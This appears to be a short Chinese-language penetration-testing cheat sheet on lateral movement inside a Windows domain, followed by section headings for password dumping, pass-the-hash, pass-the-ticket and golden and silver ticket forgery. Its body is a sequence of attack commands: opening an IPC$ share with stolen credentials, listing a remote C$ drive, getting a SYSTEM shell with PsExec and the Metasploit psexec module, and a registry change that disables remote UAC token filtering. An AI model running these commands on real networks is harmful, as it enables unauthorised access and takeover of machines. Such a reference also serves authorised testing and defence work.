横向移动
域内横向移动
windows远程连接
建立ipc$
# 建立ipc$
net use \\<目标IP>\ipc$ /user:<用户名> <密码>
# 查看建立的连接
net use
# 访问远程文件
dir \\<目标IP>\c$
# 使用 psexec.exe 反弹 shell
PsExec.exe -ACCEPTEULA \\<目标IP> -s cmd.exe
# 使用 MSF 中的 psexec 模块反弹 shell
use exploit/windows/smb/psexec
show options
set rhosts <目标IP>
set smbuser <目标用户名>
set smbpass <目标用户密码>
run
getuid
# 有些系统版本会报错,解决方案如下
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f密码、认证与权限
获取密码方式
Windows密码文件原理
密码导出方式
Windows密码提取工具
哈希传递(PTH)
获取哈希
实验
票据传递(PTT)
实验
域认证流程

伪造黄金票据
票据传送实验
伪造白银票据
使用白银票据伪造CIFS服务权限
Last updated